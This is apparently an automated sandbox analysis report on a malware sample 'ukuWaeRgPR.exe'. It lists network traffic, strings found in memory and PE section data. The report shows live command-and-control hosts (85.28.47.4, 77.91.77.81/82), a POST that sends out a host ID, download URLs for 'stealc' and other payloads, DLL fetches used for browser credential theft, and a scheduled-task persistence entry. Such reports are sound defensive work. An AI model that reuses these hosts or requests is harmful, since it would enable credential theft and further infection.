Source: unknown HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 30 43 39 36 36 38 33 39 32 37 32 30 32 39 37 34 31 31 31 39 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="hwid"660C966839272029741119------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build"default------GHDAAKJEGCFCAKEBKJJE--
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe00
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exepData
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe00
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exephprefoxox
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exera
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe50673
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe50673b5d7
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exeH
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/
Source: explorti.exe, 0000000D.00000002.3230163969.000000000120F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php%
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php)
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php-
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php0
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php5
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpI
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpU
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpk
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phplF~n
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpn
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpsa3b2c9311b.exe
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000001FEE000.00000004.00000020.00020000.00000000.sdmp, a3b2c9311b.exe, 0000000E.00000002.2770510086.00000000012DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp, a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000131B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/20475a59bac849d.php
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dlly
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dlll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dllT
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll$
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dllc
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000131B000.00000004.00000020.00020000.00000000.sdmp, a3b2c9311b.exe, 0000000E.00000002.2770510086.00000000012DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php)
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php1
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php:9y
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpC9B
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000131B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpFl
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpi94
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/a81-46d0-b6b6-535557bcc5fapN9U
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000131B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/pl
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.00000000012DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4;
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: ukuWaeRgPR.exe, random[1].exe.13.dr, a3b2c9311b.exe.13.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: ukuWaeRgPR.exe, random[1].exe.13.dr, a3b2c9311b.exe.13.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: ukuWaeRgPR.exe, random[1].exe.13.dr, a3b2c9311b.exe.13.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.4.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2210447818.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: ukuWaeRgPR.exe, 00000000.00000002.2210120301.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002056000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002142000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002142000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: GCGDGHCB.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002056000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002056000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002142000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002142000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: GCGDGHCB.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GCGDGHCB.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GCGDGHCB.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://support.mozilla.org
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002142000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002142000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002056000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: GCGDGHCB.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: ukuWaeRgPR.exe, 00000000.00000003.2107422845.000000002F9FC000.00000004.00000020.00020000.00000000.sdmp, AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: ukuWaeRgPR.exe, 00000000.00000003.2107422845.000000002F9FC000.00000004.00000020.00020000.00000000.sdmp, AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: ukuWaeRgPR.exe, 00000000.00000003.2107422845.000000002F9FC000.00000004.00000020.00020000.00000000.sdmp, AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary

Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: EHDHDHIECG.exe.0.dr Static PE information: section name:
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: .idata
Source: EHDHDHIECG.exe.0.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name: .idata
Source: explorti.exe.6.dr Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C37B700
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C37B8C0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C37B910
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C31F280
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3135A0 0_2_6C3135A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C38542B 0_2_6C38542B
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C355C10 0_2_6C355C10
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C362C10 0_2_6C362C10
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C38AC00 0_2_6C38AC00
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C38545C 0_2_6C38545C
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C325440 0_2_6C325440
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3734A0 0_2_6C3734A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37C4A0 0_2_6C37C4A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C326C80 0_2_6C326C80
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C356CF0 0_2_6C356CF0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31D4E0 0_2_6C31D4E0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C33D4D0 0_2_6C33D4D0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3264C0 0_2_6C3264C0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C33ED10 0_2_6C33ED10
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C340512 0_2_6C340512
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C32FD00 0_2_6C32FD00
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3785F0 0_2_6C3785F0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C350DD0 0_2_6C350DD0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C379E30 0_2_6C379E30
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C357E10 0_2_6C357E10
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C365600 0_2_6C365600
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31C670 0_2_6C31C670
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C386E63 0_2_6C386E63
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C339E50 0_2_6C339E50
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C353E50 0_2_6C353E50
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C334640 0_2_6C334640
